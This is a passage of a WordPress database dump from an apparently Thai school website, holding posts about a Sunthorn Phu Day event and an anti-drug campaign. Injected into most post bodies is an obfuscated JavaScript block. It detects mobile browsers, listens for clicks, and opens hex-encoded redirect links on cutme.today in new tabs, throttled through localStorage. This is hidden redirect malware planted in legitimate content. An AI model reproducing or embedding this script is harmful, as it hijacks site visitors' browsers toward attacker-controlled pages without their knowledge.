)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-30','','','2024-08-01 20:55:02','2024-08-01 13:55:02','',0,'http://pakhaeng.ssk.in.th/?p=441',0,'post','',0),
(442,1,'2024-08-01 20:54:50','2024-08-01 13:54:50','','24-67','','inherit','','closed','','24-67','','','2024-08-01 20:54:50','2024-08-01 13:54:50','',441,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/24-67.png',0,'attachment','image/png',0),
(443,1,'2024-08-01 20:55:00','2024-08-01 13:55:00','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 26 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันสุนทรภู่ กวีเอกของโลก เพื่อเป็นการส่งเสริมให้นักเรียนได้ร่วมกันรำลึกถึงเกียรติคุณของท่านสุนทรภู่ และยกย่องเชิดชู ท่านสุนทรภู่ ตลอดจนเป็นการส่งเสริมบทกวี และวรรณกรรม ซึ่งเป็นผลงานของท่านสุนทรภู่ ให้เยาวชนได้ร่วมกันสืบทอด</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ณ ใต้ถุนอาคารเรียนหลังเรียนหลังใหม่ โดยมี นายภูมิชัย</strong><strong> </strong><strong>มามะนี นายกองค์การบริหารส่วนตำบลโพธิ์ เป็นประธานในพิธี กิจกรรมประกอบไปด้วยกิจกรรม การแต่งกายเป็นตัวละครในวรรณคดี การประกวดแต่งกลอน การแข่งขันวาดภาพระบายสี ฯลฯ โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/24-67-724x1024.png\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','441-revision-v1','','','2024-08-01 20:55:00','2024-08-01 13:55:00','',441,'http://pakhaeng.ssk.in.th/?p=443',0,'revision','',0),
(444,1,'2024-08-01 20:56:04','2024-08-01 13:56:04','<!-- wp:paragraph -->\n<p>วันที่ 26 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และชุมชนบ้านหนองปลาเข็ง และบ้านกอไหล่ นำโดย นางเสน่หา พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำขบวนเดินรณรงค์ต่อต้านยาเสพติดในชุมชน โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/25-67-724x1024.png\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 